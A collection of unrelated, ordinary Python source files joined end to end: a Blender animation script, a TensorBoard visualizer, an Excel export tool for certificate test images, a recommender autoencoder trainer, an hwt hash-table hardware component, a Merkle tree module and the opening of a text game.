fcu_rot1.keyframe_points.add(len(self.movables_[obj.name]))
fcu_rot2.keyframe_points.add(len(self.movables_[obj.name]))
fcu_rot3.keyframe_points.add(len(self.movables_[obj.name]))
for i in range(0, len(self.movables_[obj.name])):
fcu_x.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][2]
fcu_y.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][3]
fcu_z.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][4]
fcu_rot0.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][5]
fcu_rot1.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][6]
fcu_rot2.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][7]
fcu_rot3.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][8]
#turning back frames to the beginning
frame_num = 0
bpy.context.scene.frame_set(frame_num)
#returning the scene
return scn
def runScene(self):
bpy.ops.screen.animation_play()
if __name__ == "__main__":
sim = Simulation()
sim.drawScene()
sim.injectKeyframes()
|
# TODO Sep 08 version
import numpy as np
import os
import sys
import ntpath
import time
from . import util, html
from subprocess import Popen, PIPE
from PIL import Image
import torchvision
import datetime
import matplotlib.pyplot as plt
# plt.switch_backend('agg')
from mpl_toolkits.mplot3d import Axes3D
# import matplotlib.gridspec as gridspec
from collections import OrderedDict
from matplotlib import cm
from tifffile import imsave
import torch
def save_images(webpage, visuals, image_path, aspect_ratio=1.0, width=256):
"""Save images to the disk,
Parameters:
webpage (the HTML class) -- the HTML webpage class that stores these images (see html.py for more details)
visuals (OrderedDict) -- an ordered dictionary that stores (name, images (either tensor or numpy) ) pairs
image_path (str) -- the string is used to create image paths
aspect_ratio (float) -- the aspect ratio of saved images
width (int) -- the images will be resized to width x width
This function will save images stored in 'visuals' to the HTML file specified by 'webpage'.
"""
image_dir = webpage.get_image_dir()
short_path = ntpath.basename(image_path[0])
name = os.path.splitext(short_path)[0]
# name = image_path
webpage.add_header(name)
ims, txts, links = [], [], []
for label, im_data in visuals.items():
image_numpy = util.tensor2im(im_data)
# Need to subtract background to reduce the across-patch background intensity difference.
label_image_dir = image_dir+'/'+label+'/'
if not os.path.exists(label_image_dir):
os.makedirs(label_image_dir)
image_name = '%s_%s.png' % (name, label)
save_path = os.path.join(label_image_dir, image_name)
image_numpy = image_numpy.squeeze()
util.save_image(image_numpy, save_path, aspect_ratio=aspect_ratio)
ims.append(save_path)
txts.append(label)
links.append(save_path)
# TODO: Fix it so that the webpage correctly displays both images.
webpage.add_images(ims, txts, links, width=width)
def save_test_metrics(save_dir, opt, ssims, psnrs):
ssim_avg_input_gt = ssims[0]
ssim_avg_output_gt = ssims[1]
ssim_whole_input_gt = ssims[2]
ssim_whole_output_gt = ssims[3]
psnr_avg_input_gt = psnrs[0]
psnr_avg_output_gt = psnrs[1]
psnr_avg_whole_input_gt = psnrs[2]
psnr_avg_whole_output_gt = psnrs[3]
message = 'Experiment Name: ' + opt.name + '\n'
message += '-------------------------------------------------\n'
message += 'Network Input vs. Groundtruth\n'
message += '(ssim_avg: %.4f, psnr_avg: %.4f, ssim_whole: %.4f, psnr_whole: %.4f)\n' % (ssim_avg_input_gt, psnr_avg_input_gt, ssim_whole_input_gt, psnr_avg_whole_input_gt)
message += '-------------------------------------------------\n'
message += 'Network Output vs. Groundtruth\n'
message += '(ssim_avg: %.4f, psnr_avg: %.4f, ssim_whole: %.4f, psnr_whole: %.4f)\n' % (ssim_avg_output_gt, psnr_avg_output_gt, ssim_whole_output_gt, psnr_avg_whole_output_gt)
message += '-------------------------------------------------'
print(message) # print the message
filename = os.path.join(save_dir, 'metrics.txt')
with open(filename, "a") as metric_file:
metric_file.write('%s\n' % message) # save the message
class Visualizer():
def __init__(self, opt):
self.opt = opt
self.win_size = opt.display_winsize
self.use_html = opt.isTrain and not opt.no_html
self.name = opt.name
self.port = opt.display_port
self.display_histogram = opt.display_histogram
self.saved = False
if self.use_html: # create an HTML object at <checkpoints_dir>/web/; images will be saved under <checkpoints_dir>/web/images/
self.web_dir = os.path.join(opt.checkpoints_dir, opt.name, 'web')
self.img_dir = os.path.join(self.web_dir, 'images')
print('create web directory %s...' % self.web_dir)
util.mkdirs([self.web_dir, self.img_dir])
self.tb_dir = os.path.join(opt.checkpoints_dir, 'tensorboard')
print('create tensorboard directory %s...' % self.tb_dir)
util.mkdir(self.tb_dir)
from torch.utils.tensorboard import SummaryWriter
#TODO: log differently by time.
self.log_dir = os.path.join(self.tb_dir, self.name)
self.tb_writer = SummaryWriter(self.log_dir)
# create a logging file to store training losses
self.log_name = os.path.join(opt.checkpoints_dir, opt.name, 'loss_log.txt')
with open(self.log_name, "a") as log_file:
now = time.strftime("%c")
log_file.write('================ Training Loss (%s) ================\n' % now)
def reset(self):
"""Reset the self.saved status."""
self.saved = False
# def display_current_model(self, model):
# self.tb_writer.add(graph)
def display_current_results(self, visuals, epoch):
"""
Display current results on tensorboard.
Parameters:
visuals (OrderedDict) -- dictionary of images to display or save.
epoch (int) -- the current epoch
"""
for label, image in visuals.items():
if self.opt.model != 'classifier':
img_np = util.tensor2im(image, imtype=np.uint8)
img_shape = img_np.shape
b, c, d, h, w = img_shape
slice_portion = int(d/2) # take the central index along each spatial axis of the 3D volume
img_sample = img_np[0, 0, slice_portion, :,:] # XY slice of the first sample in the batch
img_sample2 = img_np[0, 0, :, slice_portion, :] # XZ slice of the first sample in the batch
img_sample3 = img_np[0, 0, :, :, slice_portion] # YZ slice of the first sample in the batch
fig_slice = plt.figure(edgecolor='b', dpi=150)
ax = fig_slice.add_subplot(1, 3, 1)
ax2 = fig_slice.add_subplot(1, 3, 2)
ax3 = fig_slice.add_subplot(1, 3, 3)
ax.set_axis_off()
ax2.set_axis_off()
ax3.set_axis_off()
ax.set_title('XY slice')
ax2.set_title('XZ slice')
ax3.set_title('YZ slice')
ax.imshow(img_sample, cmap='gray')
ax2.imshow(img_sample2, cmap='gray')
ax3.imshow(img_sample3, cmap='gray')
plt.gca().set_axis_off()
plt.subplots_adjust(top=1, bottom=0, right=1, left=0,
hspace=0, wspace=0)
plt.margins(0, 0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.close(fig_slice)
img_mip_xy = np.amax(img_np[0,0], 0)
img_mip_xz = np.amax(img_np[0,0], 1)
img_mip_yz = np.amax(img_np[0,0], 2)
fig_mip = plt.figure(edgecolor='b', dpi=150)
ax_2_1 = fig_mip.add_subplot(1, 3, 1)
ax_2_2= fig_mip.add_subplot(1, 3, 2)
ax_2_3 = fig_mip.add_subplot(1, 3, 3)
ax_2_1.set_axis_off()
ax_2_2.set_axis_off()
ax_2_3.set_axis_off()
ax_2_1.set_title('XY MIP')
ax_2_2.set_title('XZ MIP')
ax_2_3.set_title('YZ MIP')
ax_2_1.imshow(img_mip_xy, vmax=256, cmap='gray')
ax_2_2.imshow(img_mip_xz, vmax=256,cmap='gray')
ax_2_3.imshow(img_mip_yz, vmax=256, cmap='gray')
plt.gca().set_axis_off()
plt.subplots_adjust(top=1, bottom=0, right=1, left=0,
hspace=0, wspace=0)
plt.margins(0, 0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.close(fig_mip)
self.tb_writer.add_figure('train_slice_images/' + label, fig_slice, epoch)
self.tb_writer.add_figure('train_mip_images/' + label, fig_mip, epoch)
else: # if the model is a classifier, display with the labels.
if label == 'output_tr_softmax' or label == 'output_val_softmax' or label =='label_GT':
#image[0] chooses the first item in the batch.
predicted = torch.argmax(image[0])
label_print = predicted.cpu().float().numpy()
if label_print == 0:
label_print_str = 'Axial'
elif label_print == 1:
label_print_str = 'Lateral'
fig_slice = plt.figure()
plt.text(0.1, 0.4, label_print_str, size=60, bbox=dict(boxstyle="square",
ec=(1., 0.5, 0.5),
fc=(1., 0.8, 0.8),
))
plt.show()
plt.close(fig_slice)
self.tb_writer.add_figure('train_images/' + label, fig_slice, epoch)
else:
img_np = util.tensor2im(image[0], imtype=np.uint8)
img_np = img_np.squeeze()
fig_slice = plt.figure()
plt.imshow(img_np, cmap='gray')
plt.close(fig_slice)
self.tb_writer.add_figure('train_images/' + label, fig_slice, epoch)
def display_model_hyperparameters(self): # note that in tensorboard this is rendered as markdown.
message = '--------------- Options ------------------ \n'
for k, v in sorted(vars(self.opt).items()):
comment = ''
message += '**{:>1}**: {:>10}{} \n'.format(str(k), str(v), comment)
message += '----------------- End -------------------'
self.tb_writer.add_text('Model_hyperparameters', message)
def display_current_histogram(self, visuals, epoch):
for label, image in visuals.items():
if self.display_histogram:
self.tb_writer.add_histogram('train_histograms/' + label, image[0][0], epoch)
def display_graph(self, model, visuals):
for label, image in visuals.items():
self.tb_writer.add_graph(model, image)
def save_current_visuals(self, visuals, epoch):
for label, image in visuals.items():
img_np = util.tensor2im(image[0], imtype=np.uint8)
file_name = os.path.join(self.img_dir, str(epoch) + '_' + str(label)+'.tif')
imsave(file_name, img_np)
def plot_current_losses(self, plot_count, losses, is_epoch=False):
"""display the current losses on tensorboard display: dictionary of error labels and values
Parameters:
plot_count (int) -- iteration count (default) or epoch count
losses (OrderedDict) -- training losses stored in the format of (name, float) pairs
"""
for label, loss in losses.items():
if is_epoch:
self.tb_writer.add_scalar('train_by_epoch/' + label, loss, plot_count)
else:
self.tb_writer.add_scalar('train_by_epoch_progress/' + label, loss, plot_count)
def print_current_losses(self, epoch, epoch_progress, losses, t_comp, t_data):
"""print current losses on console; also save the losses to the disk
Parameters:
epoch (int) -- current epoch
epoch_progress (int) -- current training progress in this epoch in percent (reset to 0 at the end of every epoch)
losses (OrderedDict) -- training losses stored in the format of (name, float) pairs
t_comp (float) -- computational time per data point (normalized by batch_size)
t_data (float) -- data loading time per data point (normalized by batch_size)
"""
message = '(epoch: %d, epoch_progress: %d%%, iter time: %.3f, data load time: %.3f) ' % (epoch, epoch_progress, t_comp, t_data)
for k, v in losses.items():
message += '%s: %.3f ' % (k, v)
print(message) # print the message
with open(self.log_name, "a") as log_file:
log_file.write('%s\n' % message) # save the message |
<filename>tests/excel_export.py<gh_stars>10-100
import os
import json
import logging
import openpyxl
from glob import glob
from pathlib import Path
from argparse import ArgumentParser
config = {
# Can be overridden by placing a config.json file in the directory
"base_url" : "https://github.com/eu-digital-green-certificates/dcc-quality-assurance/blob/main/",
"column_titles" : ["Issuing Country", "Schema Version", "Certificate Type", "Validation Status", "Code URL", "Filename"],
"column_value_ids" : ["country", "version", "type", None, "url", "file" ],
"sheet" : "Codes",
"__countryfile-doc__" : "Following section can be omitted when not using country files feature",
"countryfile-participants" : ["AT", "BE", "BG", "CH", "CY", "CZ", "DE", "DK", "EE", "EL", "ES", "FI", "FR", "HR", "HU", "IE", "IS", "IT", "LI", "LT", "LU", "LV", "MT", "NL", "NO", "PL", "PT", "RO", "SE", "SI", "SK", "SM", "VA"],
"countryfile-sheet" : "Validation Results", "countryfile-startrow" : 4,
"countryfile-ccc" : "G2",
"countryfile-constants" : {
"H2" : "Validation Cycle #",
"J2" : "Validation Period Text"
}
}
def main(args):
workbook = _get_or_create_xlsx(args.filename, config['sheet'])
workbook[config['sheet']].delete_rows(2, amount=1000)
file_entry_handlers = [] # list of callables that handle matching file entries
file_entry_handlers.append(lambda entry : _append_row( workbook[config['sheet']], entry ) )
if args.country_template is not None:
try:
countryFileGenerator = CountryFileGenerator(args.country_template)
file_entry_handlers.append( lambda entry: countryFileGenerator.addEntry(entry) )
except:
logging.error('Country file template was given but could not be loaded')
raise
return -1
# Main loop: Find all matches and pass them to all handlers
for directory in _get_country_directories():
for match in _matching_files(directory):
for handle in file_entry_handlers:
handle(match)
logging.info(f"Saving {args.filename}")
workbook.save(args.filename)
if args.country_template is not None:
countryFileGenerator.finalize()
def _append_row(sheet, value_dict):
values = [ value_dict.get(value_id) for value_id in config['column_value_ids']]
values = [ value if value is not None else '' for value in values ]
sheet.append(values)
def _get_or_create_xlsx(filename, sheet_to_use='Codes'):
try:
wb = openpyxl.load_workbook(filename)
except:
wb = openpyxl.Workbook()
wb.active.title = sheet_to_use
wb.active.append(config['column_titles'])
if not sheet_to_use in wb.sheetnames:
wb.create_sheet(sheet_to_use)
wb[sheet_to_use].append(config['column_titles'])
return wb
def _matching_files(directory):
certificate_types = ['TEST','VAC','REC','MULTI']
for ctype in certificate_types:
for match in glob(str(Path(directory,'*' , f'{ctype}*.png'))):
version = match.split(os.sep)[-2]
yield { 'type':ctype,
'country':directory,
'version':version,
'url' : config['base_url']+match.replace(os.sep,'/'),
'file' : Path(match).name }
for ctype in certificate_types:
for match in glob(str(Path(directory, '*' ,'specialcases' , f'{ctype}*.png'))):
version = match.split(os.sep)[-3]
yield { 'type':f'{ctype} SpecialCase',
'country':directory,
'version':version,
'url' : config['base_url']+match.replace(os.sep,'/'),
'file' : Path(match).name }
def _get_country_directories():
# A country directory is any directory that has a name of exactly 2 or 3 letters
twoLetters = [dirname for dirname in glob('??') if dirname.isalpha()]
threeLetters = [dirname for dirname in glob('???') if dirname.isalpha()]
return twoLetters+threeLetters
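# Illustrative layout (an assumption inferred from the glob patterns above, not part of
# the repository contents): a country directory such as 'DE' is expected to look like
# DE/1.3.0/VAC_01.png
# DE/1.3.0/specialcases/TEST_02.png
# which _matching_files('DE') would report with version '1.3.0' and types
# 'VAC' and 'TEST SpecialCase' respectively.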
class CountryFileGenerator:
'''Generates country files from a template. In order to do so, must first collect
reference data from source'''
def __init__(self, template_file_name):
self.countries = set(config["countryfile-participants"])
self.template_file_name = template_file_name
self.wb = openpyxl.load_workbook(template_file_name)
self.current_row = config["countryfile-startrow"]
#self.wb[config['countryfile-sheet']].delete_rows(config['countryfile-startrow'], amount=1000)
def addEntry(self, entry):
#self.countries |= set([entry['country']])
sheet = self.wb[config["countryfile-sheet"]]
sheet[f"D{self.current_row}"] = entry["url"]
sheet[f"E{self.current_row}"] = entry["file"]
sheet[f"F{self.current_row}"] = "y" if entry["type"].endswith("SpecialCase") else "n"
sheet[f"G{self.current_row}"] = entry["country"]
sheet[f"H{self.current_row}"] = entry["version"]
sheet[f"I{self.current_row}"] = entry["type"]
self.current_row += 1
def finalize(self):
base_file_name = self.template_file_name.replace('.xlsx','').replace('_Template','')
for country in self.countries:
logging.info(f"Saving country file for {country}")
sheet = self.wb[config["countryfile-sheet"]]
sheet[config["countryfile-ccc"]] = country
for cell,value in config["countryfile-constants"].items():
sheet[cell] = value
self.wb.save(f"{base_file_name}_{country}.xlsx")
if __name__ == '__main__':
try:
import coloredlogs
coloredlogs.install()
except:
pass # If we don't have colored logs, it's not important
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
try:
config = json.load(open('config.json'))
logging.info('Loaded config.json')
except:
logging.info('Using default configuration. Create a config.json if you want to override.')
parser = ArgumentParser(description='Excel export ')
parser.add_argument('filename', default='report.xlsx', help='Output file')
parser.add_argument('--country-template', default=None, help='Generate country files from template')
args = parser.parse_args()
main(args) |
#-*- coding:utf-8 -*-
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import os, sys
from sklearn.cluster import KMeans
from sklearn.manifold import TSNE
import pandas as pd
from contextual_dataset_yelp import PretrainDatasetIter
from macDAE import RecommendMultiHeadAttnDenoisingAutoencoder
_MODEL_NAME_MACDAE="macdae"
model_head_num = None
if (len(sys.argv) == 2):
model_head_num = sys.argv[1]
### Define input path to pretrain_model_dir
folder_path = "../"
pretrain_model_dir = None
if model_head_num is not None:
pretrain_model_dir = os.path.join(folder_path, "model/pretrain_macdae_yelp_%s" % model_head_num)
if not os.path.exists(pretrain_model_dir):
print ("DEBUG: CREATING MODEL DIR: %s" % pretrain_model_dir)
os.makedirs(pretrain_model_dir)
tf.app.flags.DEFINE_string('pretrain_model_dir', pretrain_model_dir, "model_dir")
FLAGS = tf.app.flags.FLAGS
def run_epoch(model, dataset, config):
""" model: AutoEncoder Model
"""
training_epochs = config.training_epochs
batch_size = config.batch_size
display_step = config.display_step
model_name = config.model_name
## Iterate over batches
step = 0
costs = 0.0
costs_reconstruct = 0.0
costs_lagrangian = 0.0
average_loss = 0.0
for i, group in enumerate(dataset):
u_idx_batch = group[0]
u_dense_feature_batch = group[1]
b_idx_batch = group[2]
b_sparse_feature_batch = group[3]
b_dense_feature_batch = group[4]
u_i_ids_sparse = group[5]
i_u_ids_sparse = group[6]
param = {}
param['user_id'] = u_idx_batch
param['item_id'] = b_idx_batch
param['sparse_feature'] = b_sparse_feature_batch
param['dense_feature'] = np.concatenate([u_dense_feature_batch, b_dense_feature_batch], axis=1)
param['u_i_ids_sparse'] = u_i_ids_sparse
param['i_u_ids_sparse'] = i_u_ids_sparse
cost, loss_reconstruct, loss_lagrangian = model.partial_fit(param) # cost is the total cost over the batch_size examples
## update statistics
step += batch_size
costs += cost
costs_reconstruct += loss_reconstruct
costs_lagrangian += loss_lagrangian
average_loss = costs/step
average_costs_reconstruct = costs_reconstruct/step
average_costs_lagrangian = costs_lagrangian/step
if (step % 100 == 0):
checkpoint_path = os.path.join(FLAGS.pretrain_model_dir, model_name)
model.save_model(checkpoint_path)
print("Model Saved at time step %s with average reconstruct loss %f"
% (str(step), average_costs_reconstruct))
return average_loss
def cluster(X, K):
""" Cluster on the matrix X, with shape: [batch_size, n_input]
"""
estimator = KMeans(n_clusters=K)
estimator.fit(X)
label_pred = estimator.labels_
return label_pred
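# Illustrative sketch (not part of the original pipeline): cluster 100 random
# 16-dimensional vectors into 3 groups; label_pred has one entry per row.
# X_demo = np.random.rand(100, 16)
# labels_demo = cluster(X_demo, K=3)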
def visualize(X, K=3):
""" Visualize input data X
"""
x_input = X
tsne=TSNE()
tsne.fit_transform(x_input)
labels_input = cluster(tsne.embedding_, K=K)
tsne_df = pd.DataFrame(tsne.embedding_,index=labels_input)
import matplotlib.pyplot as plt
colors = ['red', 'blue', 'green', 'burlywood','cadetblue', 'chocolate', 'cyan', 'darkgray',
'darkorange','darkred', 'lightcoral', 'lightpink', 'lime',
'navy','pink', 'purple', 'royalblue', 'seagreen',
'silver','tan', 'tomato', 'violet', 'yellow',
]
for k in range(K):
d=tsne_df[labels_input==k]
color = colors[k] if (k < len(colors)) else colors[0]
marker = '.'
plt.scatter(d[0],d[1], color=color, marker=marker)
plt.show()
def eval_model(model, dataset, limit=None):
""" classify the input tensors
"""
batch_result = []
# labels_result = []
for i, group in enumerate(dataset):
if (i % 100 == 0):
print ("DEBUG: Processing batch number %d" % i)
if limit is not None:
if (i >= limit):
break
u_idx_batch = group[0]
u_dense_feature_batch = group[1]
b_idx_batch = group[2]
b_sparse_feature_batch = group[3]
b_dense_feature_batch = group[4]
u_i_ids_sparse = group[5]
i_u_ids_sparse = group[6]
param = {}
param['user_id'] = u_idx_batch
param['item_id'] = b_idx_batch
param['sparse_feature'] = b_sparse_feature_batch
param['dense_feature'] = np.concatenate([u_dense_feature_batch, b_dense_feature_batch], axis=1)
param['u_i_ids_sparse'] = u_i_ids_sparse
param['i_u_ids_sparse'] = i_u_ids_sparse
y_pred = model.transform(param)
batch_result.append(y_pred)
# labels_result.append(labels_list[i])
## merge result
batch_array = np.concatenate(batch_result, axis=0)
print ("DEBUG: Batch Array after concatenation is: ")
print (batch_array.shape)
return batch_array
class ModelConfig(object):
## model architect
n_input = 403
n_hidden = 256
n_head = 4
## running hyperparameter
learning_rate = 0.01
dropout_probability = 0.95
class RunConfig(object):
model_name = "auto_encoder"
training_epochs = 5
batch_size = 128
display_step = 1
examples_to_show = 10
def main():
""" Input Pretrain dataset path: ../data/yelp/yelp-dataset/yelp_pretrain_dataset.pkl
"""
print ("DEBUG: model_dir is:" + FLAGS.pretrain_model_dir)
run_config = RunConfig()
model_config = ModelConfig()
print ("DEBUG: Input model_head_num is %d" % model_head_num)
model_config.n_head = model_head_num
print ("DEBUG: Model Config n_head is %d" % model_config.n_head)
training_epochs = run_config.training_epochs
data_path="../data/yelp/yelp-dataset/yelp_pretrain_dataset.pkl"
if not os.path.exists(data_path):
print ("DEBUG: Input Pretrain file path %s doesn't exist..." % data_path)
return
dataset = PretrainDatasetIter(data_path, batch_size = run_config.batch_size)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
# multi-head version
model = RecommendMultiHeadAttnDenoisingAutoencoder(
session = session,
n_head = model_config.n_head,
n_input=model_config.n_input,
n_hidden=model_config.n_hidden,
transfer_function=tf.nn.softplus,
optimizer=tf.train.AdamOptimizer(learning_rate=0.001),
dropout_probability=model_config.dropout_probability,
eps = 0.75,
penalty_lambda=0.005)
## Train Restore model if exist
model.restore_model(FLAGS.pretrain_model_dir)
# run over epoch
for e in range(training_epochs):
average_loss = run_epoch(model, dataset, run_config)
print ("DEBUG: Epoch %d average loss is %f" % (e, average_loss))
n_limit = 100
batch_array = eval_model(model, dataset, limit = n_limit)
visualize(batch_array, K=8)
if __name__ == '__main__':
if (len(sys.argv) == 2):
model_head_num = int(sys.argv[1])
print ("DEBUG: Input model model_head_num is %d" % model_head_num)
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from hwt.code import connect, If, In
from hwt.code_utils import rename_signal
from hwt.hdl.types.bits import Bits
from hwt.hdl.types.defs import BIT
from hwt.hdl.types.struct import HStruct
from hwtLib.amba.axi_comp.oooOp.outOfOrderCummulativeOp import OutOfOrderCummulativeOp
from hwtLib.amba.axi_comp.oooOp.utils import OOOOpPipelineStage
class OooOpExampleCounterHashTable(OutOfOrderCummulativeOp):
"""
This component maintains a hash table whose values are counters.
The hash table is accessed through the AXI interface.
The counters are incremented using the "dataIn" interface in a coherent way.
The operations may finish out of order, but the data on "dataOut" and in the memory
will be correct. The same applies to the swap operations (and all other operations).
.. hwt-autodoc:: _example_OooOpExampleCounterHashTable
"""
class OPERATION():
# on a swap, the original item from main memory will be stored in transaction_state.original_data
# (the place where the original insert/lookup key was stored)
# and the item carried by the initial swap transaction will be stored in the main state
SWAP = 0 # insert and return the original key, item_valid, value (can also be used to delete the item)
LOOKUP_OR_SWAP = 1 # lookup and update if the key is found, otherwise swap key, item_valid, value
LOOKUP = 2 # lookup and update if the key is found, else perform no state update
def _config(self):
OutOfOrderCummulativeOp._config(self)
# state in main memory
self.MAIN_STATE_T = HStruct(
(BIT, "item_valid"),
(Bits(32), "key"),
(Bits(self.DATA_WIDTH - 32 - 1), "value"),
)
# the transaction always just increments the counter
# so there is no need for transaction state
self.TRANSACTION_STATE_T = HStruct(
# if true the key was modified during processing
# and we need to recirculate the transaction in pipeline
# (which should be done by parent component and it does not happen automatically)
(BIT, "reset"),
# container of original key and data for insert or match
(self.MAIN_STATE_T, "original_data"),
# for output 1 if key was same as key in lookup transaction
(BIT, "key_match"),
(Bits(2), "operation"), # :see: :class:`~.OPERATION`
)
def _declr(self):
OutOfOrderCummulativeOp._declr(self)
swap_container_type = self.TRANSACTION_STATE_T.field_by_name["original_data"].dtype
assert swap_container_type is self.MAIN_STATE_T, (swap_container_type, self.MAIN_STATE_T)
def key_compare(self, k0, k1):
return k0._eq(k1)
def propagate_trans_st(self, stage_from: OOOOpPipelineStage, stage_to: OOOOpPipelineStage):
"""
Pass the operation state (lookup/swap) down the pipeline;
in the stage just before write_back, check if the key matches and store the original data when a swap is needed
"""
PIPELINE_CONFIG = self.PIPELINE_CONFIG
src = stage_from.transaction_state
dst = stage_to.transaction_state
if stage_to.index == PIPELINE_CONFIG.WRITE_BACK - 1:
key_match = rename_signal(self, stage_from.data.item_valid & self.key_compare(stage_from.data.key, src.original_data.key), "key_match")
op = stage_from.transaction_state.operation
return [
dst.key_match(key_match),
If(stage_from.valid & (op._eq(self.OPERATION.SWAP) | (op._eq(self.OPERATION.LOOKUP_OR_SWAP) & ~key_match)),
# swap, or lookup_or_swap where the key was not found; we need to store the original key
# as specified by :attr:`OooOpExampleCounterHashTable.OPERATION`
connect(stage_from.data, dst.original_data),
connect(src, dst, exclude=[dst.original_data, dst.key_match])
).Else(
connect(src, dst, exclude=[dst.key_match])
)
]
else:
return dst(src)
def write_cancel(self, write_back_st: OOOOpPipelineStage):
"""
:return: signal which, when 1, means the transaction state update is not written back to memory
(e.g. 1 if the key does not match and we do not want to update the counters)
"""
return write_back_st.valid & \
~write_back_st.transaction_state.key_match & \
write_back_st.transaction_state.operation._eq(self.OPERATION.LOOKUP)
def main_op_on_lookup_match_update(self, dst_stage: OOOOpPipelineStage, src_stage: OOOOpPipelineStage):
return [
dst_stage.data.value(src_stage.data.value + 1)
]
def main_op(self, dst_stage: OOOOpPipelineStage, src_stage: OOOOpPipelineStage):
"""
The main operation: counter incrementation.
:note: This function is called for the write-back stage and its predecessor.
However, because of the write bypass, this function is also called once for each bypass.
"""
dst = dst_stage.data
src = src_stage.data
prev_st = self.pipeline[dst_stage.index - 1]
OP = self.OPERATION
prev_st_op = prev_st.transaction_state.operation
return If(prev_st.valid & prev_st.transaction_state.key_match & In(prev_st_op, [OP.LOOKUP, OP.LOOKUP_OR_SWAP]),
# lookup or lookup_or_swap with found
dst.item_valid(src.item_valid),
dst.key(src.key),
self.main_op_on_lookup_match_update(dst_stage, src_stage),
).Elif(prev_st.valid & prev_st_op._eq(OP.SWAP),
# swap or lookup_or_swap with not found
dst(prev_st.data),
).Elif(prev_st.valid & ~prev_st.transaction_state.key_match,
# not match not swap, keep as it is
dst(src),
)
def _example_OooOpExampleCounterHashTable():
u = OooOpExampleCounterHashTable()
u.ID_WIDTH = 6
u.ADDR_WIDTH = 16 + 3
u.MAIN_STATE_T = HStruct(
(BIT, "item_valid"),
(Bits(256), "key"),
(Bits(32), "value"),
(Bits(512 - 256 - 32 - 1), "padding"),
)
u.TRANSACTION_STATE_T = HStruct(
(BIT, "reset"),
(u.MAIN_STATE_T, "original_data"),
(BIT, "key_match"),
(Bits(2), "operation"), # :see: :class:`~.OPERATION`
)
u.DATA_WIDTH = u.MAIN_STATE_T.bit_length()
return u
if __name__ == "__main__":
from hwt.synthesizer.utils import to_rtl_str
u = _example_OooOpExampleCounterHashTable()
print(to_rtl_str(u))
|
<reponame>dujiajun/Blockchain<filename>blockchain/merkle_tree.py
from typing import Optional, List
from utils.hash_utils import sha256d
from utils.printable import Printable
def get_merkle_root_of_txs(txs) -> str:
"""
Get the Merkle root hash from a list of transactions
:param txs: list of transactions
:return: hash value
"""
return get_merkle_root([tx.id for tx in txs])
def get_merkle_root(level) -> str:
"""
Compute the Merkle root hash from one level of nodes
:param level: leaf nodes
:return: hash value
"""
while len(level) != 1:
odd = None
if len(level) % 2 == 1:
odd = level.pop()
level = [sha256d(i1 + i2) for i1, i2 in pair_node(level)]
if odd:
level.append(odd)
return level[0]
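# Worked example (illustrative): with three leaf hashes [a, b, c] the odd node c is set
# aside, the pair (a, b) is hashed to sha256d(a + b), c is re-appended, and the next pass
# returns sha256d(sha256d(a + b) + c) as the root.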
def pair_node(level):
"""
Pair up the nodes of one level
:param level: one level of nodes
:return: list of pairs
"""
return (level[i:i + 2] for i in range(0, len(level), 2))
class Node(Printable):
"""梅克尔树节点"""
def __init__(self, data, pre_hashed=False):
if pre_hashed: # for leaf nodes the hash value is the input itself
self.val = data
else:
self.val = sha256d(data)
self.left_child = None
self.right_child = None
self.parent = None
self.bro = None
self.side = None
def build_new_level(leaves):
"""构建新的层级"""
new, odd = [], None
if len(leaves) % 2 == 1:
odd = leaves.pop(-1)
for i in range(0, len(leaves), 2):
newnode = Node(leaves[i].val + leaves[i + 1].val)
newnode.left_child, newnode.right_child = leaves[i], leaves[i + 1]
leaves[i].side, leaves[i + 1].side, = 'LEFT', 'RIGHT'
leaves[i].parent, leaves[i + 1].parent = newnode, newnode
leaves[i].bro, leaves[i + 1].bro = leaves[i + 1], leaves[i]
new.append(newnode)
if odd:
new.append(odd)
return new
class MerkleTree(Printable):
"""梅克尔树"""
def __init__(self, leaves=None):
"""
:param leaves: list of hash values of the leaf nodes
"""
if leaves is None:
leaves = []
self.root = None
self.leaves = []
self.set_leaves(leaves)
def set_leaves(self, leaves):
self.leaves = [Node(leaf, True) for leaf in leaves]
self.root = None
def add_node(self, leaf):
"""
Add a new node
:param leaf: the new node
"""
self.leaves.append(Node(leaf))
def clear(self):
"""梅尔克树清零"""
self.root = None
for leaf in self.leaves:
leaf.parent, leaf.bro, leaf.side = (None,) * 3
def get_root(self) -> Optional[str]:
"""计算梅尔克树根节点哈希值"""
if not self.leaves:
return None
level = self.leaves[::]
while len(level) != 1:
level = build_new_level(level)
self.root = level[0]
return self.root.val
def get_path(self, index) -> List:
"""
Get all hash values needed to compute the root hash from a leaf node
:param index: index of the leaf node in the list
:return: the path
"""
path = []
this = self.leaves[index]
path.append((this.val, 'SELF'))
while this.parent:
path.append((this.bro.val, this.bro.side))
this = this.parent
path.append((this.val, 'ROOT'))
return path
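# Illustrative usage sketch (not part of the original module): build a tree from
# pre-hashed leaves, compute the root and get the authentication path of leaf 0.
# The transaction strings below are hypothetical.
# leaves = [sha256d(tx) for tx in ("tx-a", "tx-b", "tx-c", "tx-d")]
# tree = MerkleTree(leaves)
# root = tree.get_root() # same value as get_merkle_root(leaves)
# path = tree.get_path(0) # [(leaf, 'SELF'), (sibling, 'RIGHT'), ..., (root, 'ROOT')]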
|
import json
from os import listdir
from os.path import isfile, join
import os
import sys
# Globals
story = None
life = 3
test_budget = 10
def load_story(file):
with open(file) as fp:
data = fp.read()
return json.loads(data)
def clear():
# os.system('cls')
for line in range(0,5):
print("\n")
def show_intro():
clear()
print("\n")
print(story["title"])
print("\n")
print(story["intro"])
def order_test():
global test_budget
if test_budget < 1:
show_loss("You client has run out of money. The patient dies!")
print("\nBudget for tests: ", test_budget)
print("\nSelect a test to order:\n")
test_budget = test_budget - 1
choices = []
